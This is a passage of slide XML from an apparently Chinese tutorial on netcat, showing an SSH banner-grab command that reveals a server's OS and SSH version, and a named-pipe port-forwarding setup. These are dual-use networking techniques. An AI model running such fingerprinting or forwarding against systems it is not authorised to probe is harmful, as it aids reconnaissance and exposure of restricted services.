          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="zh-CN"/>
            </a:defPPr>
            <a:lvl1pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr spc="6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marL="0" lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" spc="600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>如果某个服务器运行了 SSH 服务端（默认监听端口是 22），那么用如下命令可以看出：该服务器的操作系统类型，以及 SSH server 的版本。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" spc="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矩形 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2695635" y="446207"/>
            <a:ext cx="3752730" cy="468630"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>用法</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2600" b="1" spc="450" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="矩形 16"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2639060" y="1370330"/>
            <a:ext cx="5786755" cy="455930"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr sz="1600" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>echo "EXIT" | nc -vq 5 -n 服务器IP 22</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" spc="450"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Tree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
    <p:bldLst>
      <p:bldP spid="9" grpId="0"/>
      <p:bldP spid="17"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直角三角形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1273629"/>
            <a:ext cx="6836228" cy="3869871"/>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书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3610610" y="1305560"/>
            <a:ext cx="5105400" cy="1730375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="zh-CN"/>
            </a:defPPr>
            <a:lvl1pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr spc="600">
                <a:latin typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>服务器的某些端口出于安全的原因只允许本机或部分主机访问，如果我想要局域网内的所有主机都能访问此端口的服务就要用到端口</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>转发。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN"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矩形 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="786130" y="446405"/>
            <a:ext cx="7358380" cy="868680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>招数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>：（网络配置）基于 nc 的端口转发（Port Forward）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2600" b="1" spc="450"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Tree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
    <p:bldLst>
      <p:bldP spid="5"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nector: Elbow 2"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="4546594" y="-1074993"/>
            <a:ext cx="13621" cy="5291815"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 4675046"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="0F1D38"/>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 name="Connector: Elbow 3"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4572628" y="1156632"/>
            <a:ext cx="13621" cy="5291815"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 4595125"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="0F1D38"/>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îś1íḓè"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="683568" y="1897781"/>
            <a:ext cx="1446490" cy="1446462"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C00000"/>
          </a:solidFill>
          <a:ln w="15875">
            <a:noFill/>
            <a:miter lim="800000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr>
              <a:latin typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="iṧlîḑe"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7013385" y="1897515"/>
            <a:ext cx="1447047" cy="1447018"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:solidFill>
          <a:ln w="15875">
            <a:noFill/>
            <a:miter lim="800000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr>
              <a:latin typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="îṧḷidê"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7500992" y="2111506"/>
            <a:ext cx="501422" cy="501413"/>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bg1"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr>
              <a:latin typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="îṧḷîḍè"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1156102" y="2111506"/>
            <a:ext cx="501422" cy="501413"/>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chemeClr val="bg1"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr>
              <a:latin typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="779979" y="2747747"/>
            <a:ext cx="1253667" cy="345440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290" rtlCol="0">
            <a:spAutoFit/>
            <a:scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="threePt" dir="t"/>
            </a:scene3d>
            <a:sp3d contourW="12700"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>网络</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7110074" y="2747747"/>
            <a:ext cx="1253667" cy="345440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290" rtlCol="0">
            <a:spAutoFit/>
            <a:scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="threePt" dir="t"/>
            </a:scene3d>
            <a:sp3d contourW="12700"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>安全</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>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3635977" y="747162"/>
            <a:ext cx="1874458" cy="345440"/>
            <a:chOff x="3623277" y="1285986"/>
            <a:chExt cx="1874458" cy="345440"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="išḷïḑè"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3623277" y="1292078"/>
              <a:ext cx="1874458" cy="334065"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 50000"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="60000"/>
                <a:lumOff val="40000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln w="3175">
              <a:noFill/>
              <a:prstDash val="sysDash"/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="1">
              <a:schemeClr val="accent1"/>
            </a:lnRef>
            <a:fillRef idx="0">
              <a:schemeClr val="accent1"/>
            </a:fillRef>
            <a:effectRef idx="0">
              <a:schemeClr val="accent1"/>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="tx1"/>
            </a:fontRef>
          </p:style>
          <p:txBody>
            <a:bodyPr anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr>
                <a:latin typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="文本框 39"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3782047" y="1285986"/>
              <a:ext cx="1556919" cy="345440"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290" rtlCol="0">
              <a:spAutoFit/>
              <a:scene3d>
                <a:camera prst="orthographicFront"/>
                <a:lightRig rig="threePt" dir="t"/>
              </a:scene3d>
              <a:sp3d contourW="12700"/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>端口转发</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>原理</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13" name="文本框 41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2038832" y="925340"/>
            <a:ext cx="5080132" cy="3392170"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290" rtlCol="0">
            <a:spAutoFit/>
            <a:scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="threePt" dir="t"/>
            </a:scene3d>
            <a:sp3d contourW="12700"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr spc="225" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>用 nc 进行端口转发，需要运行【两个】nc 进程，一个充当“服务端”，另一个是“客户端”，然后用【管道】让把两个进程的“标准输入输出”交叉配对。所谓的“交叉配对”就是—每一个 nc 进程的“标准输出”都【对接】到另一个 nc 进程的“标准输入”。如此一来，就可以完美地建立【双向通讯】。  </a:t>
            </a:r>
            <a:endParaRPr spc="225"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bldLst>
      <p:bldP spid="8" grpId="0"/>
      <p:bldP spid="9"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24205" y="2696845"/>
            <a:ext cx="7895590" cy="2174875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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内容占位符 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="755650" y="2715260"/>
            <a:ext cx="7774305" cy="2011045"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="zh-CN"/>
            </a:defPPr>
            <a:lvl1pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr spc="6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marL="0" lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>运行上述命令之后，就可以把本机的 1234 端口重定向到本机的5678端口。</a:t>
            </a:r>
            <a:endParaRPr sz="1400" spc="6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lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>前一个nc充当【服务端】，后一个nc充当【客户端】。命令行中的 “管道符”使得“服务端 nc”的输出绑定到“客户端 nc”的输入。然后再用 nc_pipe 这个命名管道做中转，使得“客户端 nc”的输出绑定到“服务端 nc”的输入。从而完成了【交叉配对】。</a:t>
            </a:r>
            <a:endParaRPr sz="1400" spc="6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 name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="624205" y="1059815"/>
            <a:ext cx="7895590" cy="1042670"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="624297" y="1046766"/>
            <a:ext cx="1914585" cy="5921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2000" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>方法</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="内容占位符 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="755393" y="1633231"/>
            <a:ext cx="7774471" cy="414020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="zh-CN"/>
            </a:defPPr>
            <a:lvl1pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr spc="6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marL="0" lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" spc="600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>用这个简单的命令创建一个“命名管道”，其名称叫做 nc_pipe。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" spc="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矩形 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2695635" y="446207"/>
            <a:ext cx="3752730" cy="468630"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>用法</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2600" b="1" spc="450" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="矩形 16"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2915920" y="1179195"/>
            <a:ext cx="4329430" cy="375920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr sz="2000" b="1" spc="450" dirty="0">
